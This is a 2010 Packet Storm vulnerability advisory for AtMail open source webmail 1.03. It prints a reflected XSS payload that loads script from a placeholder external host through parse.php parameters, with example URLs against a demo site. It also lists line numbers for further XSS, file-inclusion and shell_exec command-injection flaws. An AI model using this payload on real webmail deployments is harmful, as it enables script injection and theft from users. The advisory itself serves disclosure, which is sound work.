AtMail Open Source Webmail Client 1.03 XSS / Inclusion / Command Execution

2010-06-23T00:00:00
ID PACKETSTORM:90856
Type packetstorm
Reporter Ivan Sanchez
Modified 2010-06-23T00:00:00

Description

                                        
                                            `+===========================================================================================+  
+ AtMail Open source webmail client 1.03 & XSS & Remote Execution Code +  
+===========================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: AtMail open source webmail client 1.03  
  
  
Web: http://atmail.com/ http://atmail.org/  
  
  
Versions: 1.03 (last version)  
  
  
Date: 20/06/2010  
  
  
Vendor: Informed trough web form 19-06-2010  
  
  
  
Information:  
  
  
http://atmail.com/contact.php  
  
atMail proudly serves various organizations, including leading ISPs, Portals, small to medium business   
and prestigious educational and government clients. The AtMail software powers over 10 million email accounts worldwide,   
used by people on a daily basis for their critical email communication. We serve over 4,000 paying customers from around 70 countries,   
to deliver one of the best integrated Webmail and Email-server solutions on the market.  
  
  
  
GOOGLE DORKS:  
------------  
  
n/a  
  
  
  
Evil Function:   
--------------  
  
PARSE.PHP  
  
http://demo.atmail.org/parse.php?file=html/LANG/simple/showmail_interface.html&ajax=1&func=   
http://demo.atmail.org/parse.php?file=  
  
  
  
Internal Variables without Controls:  
------------------------------------  
  
FILE  
FUNC  
  
  
  
Exploiting:  
--------------  
  
Insert and assign the evil code to these variables,then import the malicious java as you want!  
I have replaced some URL's to avoid something ;-)  
  
  
EVIL CODE= "><script src=http://site/evil.js></script>  
  
http://demo.atmail.org/parse.php?file=html/LANG/simple/showmail_interface.html&ajax=1&func= EVIL CODE  
http://demo.atmail.org/parse.php?file= EVIL CODE  
  
  
  
  
  
More files affected with differents types of holes:  
  
---------------------------------------------------  
  
Reflected XSS:  
--------------  
  
Line 412 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.  
Line 189 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.  
Line 844 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.  
  
  
  
File Inclusion:  
---------------  
  
The file index.php passes an unvalidated filename to a dynamic include statement on line 131. Allowing unvalidated user input to to control files that are included dynamically in PHP can lead to malicious code execution.  
  
  
  
Command Injection:  
-------------------  
  
Line 47 in step6.php calls shell_exec() with a command built from untrusted data. This call can cause the program to execute malicious commands on behalf of an attacker.  
  
  
  
  
  
  
  
To conclude, I could find a lot of issues regarding SLQ Injection, and other dangerous holes.  
  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
  
  
+===========================================================================================+  
+ AtMail Open source webmail client 1.03 & XSS & Remote Execution Code +  
+===========================================================================================+  
`